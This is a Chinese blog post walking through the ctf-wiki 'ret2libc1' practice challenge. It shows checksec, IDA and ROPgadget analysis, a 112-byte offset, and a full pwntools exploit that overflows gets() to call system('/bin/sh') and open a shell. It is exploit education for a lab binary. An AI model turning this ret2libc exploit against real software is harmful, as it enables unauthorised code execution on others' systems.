登录注册写文章

ret2libc1

y1deer

ret2libc1

ctf-wiki
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop-zh/

checksec查看保护机制
开了NX

image.png

把文件拖进ida，main函数，f5，发现gets()函数，漏洞所在地

顺便查看函数，发现system函数，地址为0x08048460

image.png

利用工具ROPgadget，查找是否有/bin/sh存在，地址为0x08048720

image.png

gdb调试计算偏移量为112

image.png

exp

#!/usr/bin/env python
from pwn import *

sh = process('./ret2libc1')

binsh_addr = 0x08048720
system_addr = 0x08048460
payload = flat(['a'*112, system_addr, 'b'*4, binsh_addr])
sh.sendline(payload)

sh.interactive()

exp运行

image.png

最后编辑于：2019.08.01 08:53:52

推荐阅读更多精彩内容

ret2libc1 system和/bin/sh的利用
1.setvbuf函数 int setvbuf([FILE](*stream, char *buf, int ty...
Zero_0_0阅读 3,248评论 0赞 0
【Linux内核漏洞利用】2018强网杯core_栈溢出
一.linux内核漏洞利用预备知识参考：https://ctf-wiki.github.io/ctf-wiki/...
bsauce阅读 3,461评论 1赞 6
总要有一点光11.7日
那天，主编在群里说了一信息；新凤霞五十岁开始写作，由一个目不识丁的人，成长成为一个写出三十多万字的作家。这个讯息很...
微语素心阅读 261评论 10赞 4
普洱茶
从神农的舌尖滑过在陆羽的笔墨中驻足带着诸葛孔明的乡愁从马背上出发来到了欧洲的原野让那些蓝眼睛高鼻子惊叹 ...
拐塘湾老吴阅读 380评论 5赞 4
iOS - 利用runtime处理font返回nil
创建font的分类，利用runtime中exchange方法实现：
Freedom_fly阅读 402评论 0赞 0

赞1赞

赞赏

手机看全文